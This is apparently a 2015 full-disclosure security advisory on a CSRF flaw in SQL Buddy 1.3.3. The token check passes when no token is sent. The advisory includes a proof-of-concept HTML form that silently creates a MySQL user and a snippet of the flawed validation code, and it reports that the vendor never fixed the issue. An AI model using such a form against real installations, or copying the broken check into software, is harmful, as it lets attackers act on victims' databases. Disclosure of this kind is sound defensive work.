SQL Buddy 1.3.3: CSRF
Date: 2015-10-07 15:46:211. Introduction
Affected Product: | SQL Buddy 1.3.3 |
Fixed in: | not fixed |
Fixed Version Link: | n/a |
Vendor Contact: | nom@deliciousbrains.com |
Vulnerability Type: | CSRF |
Remote Exploitable: | Yes |
Reported to vendor: | 08/18/2015 |
Disclosed to public: | 10/07/2015 |
Release mode: | Full Disclosure |
CVE: | n/a |
Credits | Tim Coen of Curesec GmbH |
2. Vulnerability Description
None of the forms of SQL Buddy 1.3.3 have proper CSRF protection, which means that an attacker can perform actions for the victim if the victim visits an attacker controlled site while logged in.
While SQL Buddy does have CSRF protection, it does not work properly. If a CSRF token is sumbitted, it has to be correct. However, if no token is submitted, the check is passed as well.
3. Proof of Concept
Insert a new MySQL user:
<form name="myform" method="post" action="http://localhost/sqlbuddy/query.php?ajaxRequest=2807&db=foo" >
<input type="hidden" name="query" value="CREATE USER 'injected'@'localhost' IDENTIFIED BY 'injected';">
4. Code
function validateRequest() {
global $requestKey;
if (isset($_GET['requestKey']) && $_GET['requestKey'] != $requestKey) {
return false;
return true;
5. Solution
This issue was not fixed by the vendor.
6. Report Timeline
08/18/2015 | Informed Vendor about Issue (no reply) |
09/16/2015 | Reminded Vendor of release date (no reply) |
10/07/2015 | Disclosed to public |